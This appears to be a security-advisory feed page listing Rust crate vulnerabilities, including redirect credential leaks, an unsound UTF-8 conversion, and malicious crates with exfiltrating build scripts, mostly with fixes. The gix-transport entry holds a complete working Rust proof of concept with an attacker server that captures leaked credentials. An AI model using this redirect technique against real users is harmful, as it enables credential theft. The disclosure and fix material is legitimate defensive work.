2. Call `gix_validate::submodule::name()` in `git_dir()` before constructing the path
3. Do NOT inherit `git_dir_trust` from the parent when opening submodule repos -- always re-derive trust from path ownership

### Severity

High. Network vector (via clone), requires user interaction (submodule operations). The trust bypass enables credential disclosure from traversed git directories. Confidentiality impact is high.
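Suggested fix #1 above (check all `..` occurrences, not just the first) can be sketched as follows. This is a minimal illustration on raw byte slices, not gitoxide's actual `gix_validate` code; the function name `validate_name` and its error type are hypothetical.

```rust
// Hypothetical sketch of suggested fix #1: reject a submodule name if ANY
// ".." occurrence forms a path component, not just the first occurrence.
fn validate_name(name: &[u8]) -> Result<(), &'static str> {
    let mut start = 0;
    while let Some(pos) = name[start..].windows(2).position(|w| w == b"..") {
        let pos = start + pos;
        // ".." is a traversal component only if it is bounded by a path
        // separator (or the string boundary) on both sides.
        let before_ok = pos == 0 || name[pos - 1] == b'/' || name[pos - 1] == b'\\';
        let after_ok = pos + 2 == name.len()
            || name[pos + 2] == b'/'
            || name[pos + 2] == b'\\';
        if before_ok && after_ok {
            return Err("submodule name contains a parent-directory component");
        }
        start = pos + 1; // keep scanning the rest of the string
    }
    Ok(())
}

fn main() {
    // The bypass string from the advisory is now rejected:
    assert!(validate_name(b"a..b/../../../.git/").is_err());
    // A benign embedded ".." (not a path component) still passes:
    assert!(validate_name(b"a..b").is_ok());
    assert!(validate_name(b"plain-name").is_ok());
}
```

Unlike the single `find(b"..")`, the loop keeps scanning after each benign occurrence, so the `/../../../` later in the bypass string is reached and rejected.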

الإصدارات المتأثرة

All versions < 0.83.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

غير محدد
📦 gix-transport 📌 All versions < 0.56.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary The curl-based HTTP transport in `gix-transport` sends user credentials (passwords, tokens) to an attacker-controlled server after an HTTP redirect. When a server responds with a 302 redirect during the initial `GET /info/refs`, gitoxide records the redirected base UR...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary

The curl-based HTTP transport in `gix-transport` sends user credentials (passwords, tokens) to an attacker-controlled server after an HTTP redirect. When a server responds with a 302 redirect during the initial `GET /info/refs`, gitoxide records the redirected base URL and rewrites all subsequent requests to point at the redirected host. The `Authorization` header is still attached because `add_basic_auth_if_present()` only checks `self.url` (the original, never-updated URL).

The reqwest backend is not affected. Its custom redirect policy at `reqwest/remote.rs` lines 60-64 compares `prev_url.host_str()` to `curr_url.host_str()` and calls `attempt.stop()` on cross-domain redirects, so `redirected_base_url` is never set to a different host.

## Details

The vulnerability involves two components in `gix-transport`:

**1. URL rewriting after redirect** ([gix-transport/src/client/blocking_io/http/curl/remote.rs](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-transport/src/client/blocking_io/http/curl/remote.rs))

After a request completes, the effective URL is compared to the requested URL. If they differ (a redirect occurred), the new base URL is stored (lines 355-359). On subsequent requests, `swap_tails()` rewrites the target URL to point at the redirected host (line 166).

**2. Credential check uses the original URL** ([gix-transport/src/client/blocking_io/http/mod.rs, lines 293-312](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-transport/src/client/blocking_io/http/mod.rs#L293))

`add_basic_auth_if_present()` checks `self.url` (set once during construction, never mutated) to decide whether to attach credentials. Since `self.url` always points to the original host, credentials are approved even when the actual request goes to the redirected (attacker) host.
The `Authorization` header is added to the headers list in `handshake()` (line 374) and `request()` (line 434) before being passed to the backend, which applies it to the rewritten URL via `handle.http_headers(headers)` (line 309).

### Attack flow: cross-domain credential leak

1. The victim clones `https://legitimate.com/repo` with credentials configured
2. The server returns a 302 redirect on `GET /info/refs` to `https://attacker.com/...`
3. Curl follows the redirect and strips `Authorization` for this GET (safe so far)
4. The attacker serves a valid info/refs response; `redirected_base_url` is set
5. `POST /git-upload-pack` is rewritten via `swap_tails()` to `attacker.com`
6. `add_basic_auth_if_present()` checks `self.url` (still `legitimate.com`) and approves sending credentials
7. `Authorization: Basic <credentials>` is sent to `attacker.com`

Curl's cross-domain header stripping only protects the redirected GET. It does not protect the POST, which is a new request with credentials re-attached by gitoxide.

### Secondary vector: HTTPS-to-HTTP downgrade

The cleartext protection at `mod.rs` lines 300-305 also checks `self.url`:

```rust
if self.url.starts_with("http://") {
    return Err(client::Error::AuthenticationRefused("..."));
}
```

This only validates the original URL's scheme, not the effective URL after the redirect. A redirect from `https://legitimate.com` to `http://attacker.com` bypasses this check, causing credentials to be sent in cleartext over HTTP.

1. The victim clones `https://legitimate.com/repo` with credentials
2. The server redirects to `http://attacker.com/...` (note: HTTP, not HTTPS)
3. `add_basic_auth_if_present()` checks `self.url` (still `https://`) and allows credentials
4. The `Authorization` header is sent over unencrypted HTTP to `attacker.com`

## PoC

A complete Rust project that reproduces the issue. It starts two local TCP servers (legitimate on :8080, attacker on :9090) and uses `gix-transport` to demonstrate the credential leak.
**To run:** Create the project next to the gitoxide checkout so the path dependencies resolve, then `cargo run`.

<details>
<summary>Cargo.toml</summary>

```toml
[package]
name = "poc-gitoxide-redirect"
version = "0.1.0"
edition = "2021"

[dependencies]
# http-client-insecure-credentials is only needed because the PoC uses http://
# to avoid TLS setup. A real attack would use https:// and not require this feature.
gix-transport = { path = "../gitoxide/gix-transport", features = ["http-client-curl", "http-client-insecure-credentials"] }
gix-sec = { path = "../gitoxide/gix-sec" }
gix-url = { path = "../gitoxide/gix-url" }
gix-packetline = { path = "../gitoxide/gix-packetline", features = ["blocking-io"] }
```

</details>

<details>
<summary>src/main.rs</summary>

```rust
use std::io::{BufRead, BufReader, Write};
use std::net::TcpListener;
use std::sync::mpsc;
use std::thread;

use gix_transport::client::{self, blocking_io::http, blocking_io::Transport, TransportWithoutIO};

fn main() {
    println!("=== gitoxide HTTP credential leak via redirect ===\n");
    let (captured_tx, captured_rx) = mpsc::channel::<Vec<String>>();

    // Attacker server (port 9090): captures credentials
    let attacker = TcpListener::bind("127.0.0.1:9090").expect("bind attacker");
    let attacker_handle = thread::spawn(move || {
        let (mut conn1, _) = attacker.accept().expect("accept conn1");
        let mut reader1 = BufReader::new(conn1.try_clone().unwrap());
        let mut headers1 = Vec::new();
        loop {
            let mut line = String::new();
            reader1.read_line(&mut line).unwrap();
            if line.trim().is_empty() { break; }
            headers1.push(line.trim().to_string());
        }
        println!("[attacker] GET /info/refs headers (from redirect):");
        for h in &headers1 {
            println!("  {h}");
        }

        let pkt_service = "001e# service=git-upload-pack\n";
        let pkt_flush = "0000";
        let fake_hash = "a".repeat(40);
        let caps = "multi_ack thin-pack side-band side-band-64k ofs-delta shallow no-progress include-tag";
        let ref_line = format!("{fake_hash} HEAD\0{caps}\n");
        let ref_pkt = format!("{:04x}{ref_line}", ref_line.len() + 4);
        let body = format!("{pkt_service}{pkt_flush}{ref_pkt}{pkt_flush}");
        let response = format!(
            "HTTP/1.1 200 OK\r\nContent-Type: application/x-git-upload-pack-advertisement\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{body}",
            body.len()
        );
        conn1.write_all(response.as_bytes()).unwrap();
        conn1.flush().unwrap();
        drop(conn1);

        let (mut conn2, _) = attacker.accept().expect("accept conn2");
        let mut reader2 = BufReader::new(conn2.try_clone().unwrap());
        let mut headers2 = Vec::new();
        let mut content_length: usize = 0;
        loop {
            let mut line = String::new();
            reader2.read_line(&mut line).unwrap();
            if line.trim().is_empty() { break; }
            let trimmed = line.trim().to_string();
            if let Some(cl) = trimmed.strip_prefix("Content-Length: ") {
                content_length = cl.parse().unwrap_or(0);
            }
            headers2.push(trimmed);
        }
        if content_length > 0 {
            let mut body_buf = vec![0u8; content_length];
            use std::io::Read;
            reader2.read_exact(&mut body_buf).ok();
        }
        println!("\n[attacker] POST /git-upload-pack headers:");
        for h in &headers2 {
            let prefix = if h.starts_with("Authorization:") { "  >>> LEAKED: " } else { "  " };
            println!("{prefix}{h}");
        }
        let resp_body = "0000";
        let response2 = format!(
            "HTTP/1.1 200 OK\r\nContent-Type: application/x-git-upload-pack-result\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{resp_body}",
            resp_body.len()
        );
        conn2.write_all(response2.as_bytes()).unwrap();
        conn2.flush().unwrap();
        drop(conn2);
        captured_tx.send(headers2).ok();
    });

    // Legitimate server (port 8080): redirects to attacker
    let legit = TcpListener::bind("127.0.0.1:8080").expect("bind legit");
    let legit_handle = thread::spawn(move || {
        let (mut conn, _) = legit.accept().expect("accept legit");
        let mut reader = BufReader::new(conn.try_clone().unwrap());
        let mut request_line = String::new();
        reader.read_line(&mut request_line).unwrap();
        println!("[legit] Received: {}", request_line.trim());
        loop {
            let mut line = String::new();
            reader.read_line(&mut line).unwrap();
            if line.trim().is_empty() { break; }
        }
        let redirect_url = "http://127.0.0.1:9090/repo.git/info/refs?service=git-upload-pack";
        let response = format!(
            "HTTP/1.1 302 Found\r\nLocation: {redirect_url}\r\nContent-Length: 0\r\n\r\n"
        );
        conn.write_all(response.as_bytes()).unwrap();
        conn.flush().unwrap();
        println!("[legit] Sent 302 redirect to attacker server");
    });

    thread::sleep(std::time::Duration::from_millis(100));
    println!("\n[client] Connecting to http://127.0.0.1:8080/repo.git with credentials...");
    let url: gix_url::Url = "http://127.0.0.1:8080/repo.git".try_into().expect("parse url");
    let mut transport: http::Transport<http::curl::Curl> =
        http::connect(url, gix_transport::Protocol::V1, false);
    transport
        .set_identity(gix_sec::identity::Account {
            username: "victim-user".into(),
            password: "super-secret-token".into(),
            oauth_refresh_token: None,
        })
        .expect("set identity");

    println!("[client] Performing handshake (GET /info/refs)...");
    match transport.handshake(gix_transport::Service::UploadPack, &[]) {
        Ok(_) => println!("[client] Handshake succeeded"),
        Err(e) => println!("[client] Handshake error: {e}"),
    }
    println!("[client] Sending request (POST /git-upload-pack)...");
    match transport.request(client::WriteMode::Binary, client::MessageKind::Flush, false) {
        Ok(_writer) => println!("[client] Request sent"),
        Err(e) => println!("[client] Request error: {e}"),
    }

    legit_handle.join().ok();
    attacker_handle.join().ok();

    println!("\n=== RESULT ===");
    if let Ok(headers) = captured_rx.recv_timeout(std::time::Duration::from_secs(2)) {
        let leaked = headers.iter().any(|h| h.starts_with("Authorization:"));
        if leaked {
            let auth = headers.iter().find(|h| h.starts_with("Authorization:")).unwrap();
            println!("VULNERABLE: Credentials leaked to attacker server!");
            println!("Captured: {auth}");
        } else {
            println!("NOT VULNERABLE: No credentials captured.");
        }
    } else {
        println!("ERROR: Timed out.");
    }
}
```

</details>

**Output:**

```
[attacker] GET /info/refs headers (from redirect):
  GET /repo.git/info/refs?service=git-upload-pack HTTP/1.1
  Host: 127.0.0.1:9090
  Accept: */*
  User-Agent: git/oxide-0.55.0

[attacker] POST /git-upload-pack headers:
  POST /repo.git/git-upload-pack HTTP/1.1
  Host: 127.0.0.1:9090
  >>> LEAKED: Authorization: Basic dmljdGltLXVzZXI6c3VwZXItc2VjcmV0LXRva2Vu

VULNERABLE: Credentials leaked to attacker server!
Captured: Authorization: Basic dmljdGltLXVzZXI6c3VwZXItc2VjcmV0LXRva2Vu
```

The GET (from the redirect) carries no `Authorization` header. The POST carries the full credentials; the base64 decodes to `victim-user:super-secret-token`.

## Impact

Any user who clones or fetches over HTTP(S) using gitoxide with the curl backend (`http-client-curl` feature) can have their credentials stolen by an attacker who controls a redirect target (via a compromised server, DNS hijacking, or MITM). The only user interaction required is initiating the clone or fetch; the redirect and credential leak happen transparently. CI/CD pipelines using tokens are also at risk.

## Suggested Fix

1. Only attach `Authorization` if the effective URL's host matches the original URL's host.
2. Or block cross-origin redirects in the curl backend, matching reqwest's behavior.
3. Check the effective URL's scheme (not the original) for the HTTPS-to-HTTP downgrade.
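Suggested fixes 1 and 3 amount to one rule: derive the credential decision from the URL the request will actually go to, not the URL captured at construction. A minimal sketch of such a predicate (hypothetical helper with naive string-based host extraction, not gix-transport's actual API):

```rust
// Hypothetical sketch: decide whether to attach the Authorization header
// based on the *effective* (post-redirect) URL instead of the original one.
fn may_attach_credentials(original: &str, effective: &str) -> bool {
    // Naive host extraction for illustration; a real fix would use a
    // proper URL parser such as gix-url.
    fn host_of(url: &str) -> Option<&str> {
        let rest = url.split_once("://")?.1;
        Some(rest.split(|c| c == '/' || c == '?').next().unwrap_or(rest))
    }
    // Fix 3: judge the cleartext check on the effective scheme, so an
    // HTTPS-to-HTTP downgrade never carries credentials.
    if !effective.starts_with("https://") {
        return false;
    }
    // Fix 1: only attach credentials if the redirect stayed on the
    // original host.
    host_of(original) == host_of(effective)
}

fn main() {
    // Same host, still HTTPS: credentials allowed.
    assert!(may_attach_credentials(
        "https://legitimate.com/repo",
        "https://legitimate.com/repo.git/git-upload-pack"
    ));
    // Cross-host redirect (the primary attack flow): blocked.
    assert!(!may_attach_credentials(
        "https://legitimate.com/repo",
        "https://attacker.com/repo.git/git-upload-pack"
    ));
    // HTTPS-to-HTTP downgrade (the secondary vector): blocked.
    assert!(!may_attach_credentials(
        "https://legitimate.com/repo",
        "http://legitimate.com/repo"
    ));
}
```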

الإصدارات المتأثرة

All versions < 0.56.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

عالية
📦 diesel 📌 All versions < 2.3.8 🗃️ قاعدة بيانات 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Diesel uses the `sqlite3_value_text` function to receive strings from SQLite while deserializing query results. We misinterpreted the corresponding [SQLite](https://sqlite.org/c3ref/value_blob.html) documentation that this function always returns a UTF-8 encoded string values as ...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Diesel uses the `sqlite3_value_text` function to receive strings from SQLite while deserializing query results. We misinterpreted the corresponding [SQLite documentation](https://sqlite.org/c3ref/value_blob.html) as guaranteeing that this function always returns UTF-8 encoded string values as `*const c_char`. Based on that, we used `str::from_utf8_unchecked` to construct a Rust string slice without any additional UTF-8 checks. It turned out that this function does not always return correct UTF-8: for fields with the SQLite storage type `BLOB`, the pointer can contain arbitrary bytes, which makes the use of `str::from_utf8_unchecked` unsound, as it violates the safety invariant that a `str` only contains valid UTF-8.

## Mitigation

The preferred mitigation is to update to Diesel version 2.3.8 or newer, which includes a fix for the problem.

## Resolution

Diesel now correctly checks whether the provided byte buffer is actually valid UTF-8 instead of relying on SQLite's documentation. This fix is included in the `2.3.8` release.
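The core of the unsoundness can be shown in a few lines. This is an illustrative sketch (the function name is hypothetical, not Diesel's actual code): a `BLOB` column can hand back arbitrary bytes, so the checked conversion must be used.

```rust
// Illustrative sketch: the fix replaces `str::from_utf8_unchecked` (which
// is undefined behavior on non-UTF-8 input) with the checked conversion.
fn text_from_sqlite(bytes: &[u8]) -> Result<&str, std::str::Utf8Error> {
    std::str::from_utf8(bytes)
}

fn main() {
    // Well-formed UTF-8 passes through unchanged.
    assert_eq!(text_from_sqlite(b"hello").unwrap(), "hello");
    // Bytes a BLOB column could contain: invalid UTF-8 is rejected
    // instead of producing an invalid `&str`.
    assert!(text_from_sqlite(&[0xff, 0xfe, 0x00]).is_err());
}
```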

الإصدارات المتأثرة

All versions < 2.3.8

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

غير محدد
📦 steamworks 📌 All versions < 0.13.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API ...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers that use the `begin_authentication_session` API to authenticate players, if a malicious game client sends an authentication ticket with a network identity that does not match that of the verifier.
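The underlying pattern is a raw-to-enum conversion with no fallback arm. A minimal illustration (the types and raw values are hypothetical, not the steamworks crate's actual code): converting an FFI enum value with a catch-all `panic!` lets a remote peer crash the process by sending a variant the binding does not know about, whereas an `Unknown` variant absorbs it.

```rust
// Illustrative sketch of panic-free raw enum conversion. One robust
// pattern is to represent unrecognized raw values instead of panicking.
#[derive(Debug, PartialEq)]
enum AuthResponse {
    Ok,
    TicketInvalid,
    // Catch-all for raw values the binding was not written to expect.
    Unknown(i32),
}

fn from_raw(raw: i32) -> AuthResponse {
    match raw {
        0 => AuthResponse::Ok,
        1 => AuthResponse::TicketInvalid,
        // The buggy pattern would be `other => panic!("unknown: {other}")`,
        // turning attacker-controlled input into a crash.
        other => AuthResponse::Unknown(other),
    }
}

fn main() {
    assert_eq!(from_raw(0), AuthResponse::Ok);
    // A raw value the match arms do not cover (such as the one behind
    // k_EAuthSessionResponseAuthTicketNetworkIdentityFailure) is handled
    // gracefully instead of panicking.
    assert_eq!(from_raw(11), AuthResponse::Unknown(11));
}
```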

الإصدارات المتأثرة

All versions < 0.13.1

5.3/10 متوسطة
📦 thrift 🏢 apache 📌 All versions < 0.23.0 🗄️ سيرفر 🦀 مكتبة Rust crates.io ⚡ CWE-789 🎯 عن بعد ⚪ لم تُستغل
💬 Memory Allocation with Excessive Size Value vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.
📅 2026-05-05 NVD 🔗 التفاصيل

الوصف الكامل

Memory Allocation with Excessive Size Value vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.

الإصدارات المتأثرة

All versions < 0.23.0

نوع الثغرة

CWE-789 — Memory Allocation with Excessive Size Value

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

منخفضة
📦 sequoia-git 📌 All versions < 0.6.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Before `sq-git` checks if a commit can be authenticated, it first looks for hard revocations. Because parsing a policy is expensive and a project's policy rarely changes, `sq-git` has an optimization to only check a policy if it hasn't checked it before. It does this by maintai...
📅 2026-05-04 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Before `sq-git` checks whether a commit can be authenticated, it first looks for hard revocations. Because parsing a policy is expensive and a project's policy rarely changes, `sq-git` has an optimization to only check a policy it hasn't checked before. It does this by maintaining a set of already-seen policies, keyed on the policy's hash. Unfortunately, due to a bug, the hash was truncated to 0 bytes, and thus only hard revocations in the target commit were considered. Normally this is not a problem, as hard revocations are not removed from the signing policy. An attacker could nevertheless exploit this flaw as follows. Consider Alice and Bob, who maintain a project together. If Bob's certificate is compromised and Bob issues a hard revocation, Alice can add it to the project's signing policy. An attacker who has access to Bob's key can then create a merge request that strips the hard revocation. If Alice merges Bob's merge request, the latest commit will not carry the hard revocation, and `sq-git` will not see it when authenticating that commit or any following commits.

Note: for this attack to be successful, Alice needs to be tricked into merging the malicious MR. If Alice reviews MRs, she is likely to notice changes to the signing policy.

Reported-by: Hassan Sheet
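The effect of the truncation bug can be demonstrated in isolation. This is an illustrative sketch (the function name is hypothetical, not `sq-git`'s actual code): a hash key truncated to zero bytes makes every policy collide with the first one seen, so later policies are never re-parsed.

```rust
use std::collections::HashSet;

// Illustrative sketch of the caching bug: keying the "already checked"
// set on a hash truncated to zero bytes makes all policies collide.
fn truncated_key(policy_hash: &[u8]) -> Vec<u8> {
    // The bug: the truncation length was 0, so every key is empty.
    policy_hash[..0].to_vec()
}

fn main() {
    let mut seen = HashSet::new();
    let policy_a: &[u8] = b"hash-of-policy-with-revocation";
    let policy_b: &[u8] = b"hash-of-policy-stripped-of-revocation";

    // The first policy is inserted and therefore actually checked.
    assert!(seen.insert(truncated_key(policy_a)));
    // A *different* policy maps to the same (empty) key, so it is treated
    // as already checked and its hard revocations are never parsed.
    assert!(!seen.insert(truncated_key(policy_b)));
}
```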

الإصدارات المتأثرة

All versions < 0.6.0

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

حرجة
📦 mysten-metrics 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل
💬 `mysten-metrics` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.
📅 2026-05-04 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`mysten-metrics` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.

الإصدارات المتأثرة

All versions < 0

حرجة
📦 sui-execution-cut 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل
💬 `sui-execution-cut` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.
📅 2026-05-04 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`sui-execution-cut` included a build script that attempted to exfiltrate data from the build machine. The malicious crate had 1 version published on 2026-04-20 and had no evidence of actual usage. This crate had no dependencies on crates.io.

الإصدارات المتأثرة

All versions < 0

غير محدد
📦 imageproc 📌 All versions < 0.26.2 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 A bounds check was performed in floating points before a cast to the index passed to an unchecked access function. This checked considered `NaN` cases improperly, causing them to succeed the check instead of failing it. The floating point coordinate is under caller control by pas...
📅 2026-05-01 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A bounds check was performed in floating point before the cast to the index passed to an unchecked access function. This check handled `NaN` improperly, causing `NaN` values to pass the check instead of failing it. The floating-point coordinate is under caller control, by passing a chosen projection matrix. Carefully controlling the coordinates of an image with no data and one non-zero dimension provides an arbitrary read primitive over the first 32 bits of address space with the bilinear sampling method. Using bicubic sampling can result in a read of a few bytes beyond an allocation. Other out-of-bounds reads may be possible.
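The `NaN` pitfall is that every comparison with `NaN` is false, so a bounds check written in the "not out of range" form silently passes. A minimal sketch (function names are illustrative, not imageproc's actual code):

```rust
// Illustrative sketch of the NaN bounds-check pitfall.
fn in_bounds_buggy(x: f32, width: f32) -> bool {
    // NaN < 0.0 and NaN >= width are both false, so NaN "passes".
    !(x < 0.0 || x >= width)
}

fn in_bounds_fixed(x: f32, width: f32) -> bool {
    // Writing the condition positively rejects NaN, since NaN >= 0.0
    // is also false.
    x >= 0.0 && x < width
}

fn main() {
    assert!(in_bounds_buggy(f32::NAN, 100.0));  // NaN sneaks through
    assert!(!in_bounds_fixed(f32::NAN, 100.0)); // NaN is rejected
    // Casting the NaN coordinate to an integer index and feeding it to an
    // unchecked access is what turns this into an out-of-bounds read.
}
```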

الإصدارات المتأثرة

All versions < 0.26.2

غير محدد
📦 imageproc 📌 All versions < 0.26.2 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 A bounds verification of a slice storage of a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of individual dimensions. This would erroneously cast *after* the multiplication and consequently fail to detect possible violations when ...
📅 2026-05-01 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A bounds verification of the slice storing a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of the individual dimensions. It erroneously cast *after* the multiplication and consequently failed to detect violations when the multiplication overflows. Afterwards, the individual sizes were trusted to constrain coordinates within the matrix to indices valid for the underlying storage. With a crafted `Kernel` object, certain combinations of coordinates could then cause an out-of-bounds access in an `unsafe` function while fulfilling its documented preconditions. The kernel value could be passed to library functions that trusted those preconditions and then performed such reads.
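A minimal sketch of the overflow described above (names are illustrative, not imageproc's actual code): if the width-by-height product wraps in a narrow integer type before the cast, a tiny buffer can "match" huge claimed dimensions, and later indexing trusts the individual dimensions.

```rust
// Illustrative sketch: size validation that multiplies before widening.
fn size_ok_buggy(len: usize, width: u32, height: u32) -> bool {
    // wrapping_mul stands in for the unchecked multiply: 65536 * 65536
    // wraps to 0 in u32 *before* the cast to usize.
    len == width.wrapping_mul(height) as usize
}

fn size_ok_fixed(len: usize, width: u32, height: u32) -> bool {
    // checked_mul detects the overflow instead of wrapping past it.
    match width.checked_mul(height) {
        Some(n) => len == n as usize,
        None => false, // overflow: the dimensions cannot be trusted
    }
}

fn main() {
    // 65536 * 65536 wraps to 0 in u32, so an EMPTY buffer passes the
    // buggy check while width and height individually remain huge.
    assert!(size_ok_buggy(0, 65536, 65536));
    assert!(!size_ok_fixed(0, 65536, 65536));
    // Honest dimensions still validate.
    assert!(size_ok_fixed(6, 2, 3));
}
```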

الإصدارات المتأثرة

All versions < 0.26.2

غير محدد
📦 imageproc 📌 All versions < 0.26.2 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚪ لم تُستغل 🟢 ترقيع
💬 A read of pixels was coded as modifying coordinates to lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and 'dimension - 1'. This would not protect against malicious inputs that could ...
📅 2026-05-01 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A read of pixels was coded to modify coordinates so that they lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and `dimension - 1`. This does not protect against malicious inputs that overflow the addition. After the tricked bounds check, the image could then be sampled at multiple, differently calculated coordinates exceeding the bounds.
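The flaw is that `min(x + k, dimension - 1)` only clamps the *result* of the addition; if the addition itself wraps, the wrapped value can sit well below the clamp. A minimal sketch (names are illustrative, not imageproc's actual code):

```rust
// Illustrative sketch: clamping after a wrapping addition.
fn clamp_buggy(x: u32, k: u32, dim: u32) -> u32 {
    // wrapping_add models the unchecked addition: u32::MAX + 2 wraps
    // to 1, so the "clamped" coordinate is nowhere near the edge pixel
    // that was intended.
    x.wrapping_add(k).min(dim - 1)
}

fn clamp_fixed(x: u32, k: u32, dim: u32) -> u32 {
    // saturating_add pins the result at u32::MAX on overflow, so min()
    // clamps to the last valid coordinate as intended.
    x.saturating_add(k).min(dim - 1)
}

fn main() {
    let dim = 100;
    assert_eq!(clamp_buggy(u32::MAX, 2, dim), 1);  // wrapped past the clamp
    assert_eq!(clamp_fixed(u32::MAX, 2, dim), 99); // clamped to dim - 1
    // In-range inputs behave identically in both versions.
    assert_eq!(clamp_fixed(10, 5, dim), 15);
}
```

The danger with the buggy version is not the single wrong coordinate but that several coordinates derived from the same wrapped input are computed differently, so at least one can land outside the image.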

الإصدارات المتأثرة

All versions < 0.26.2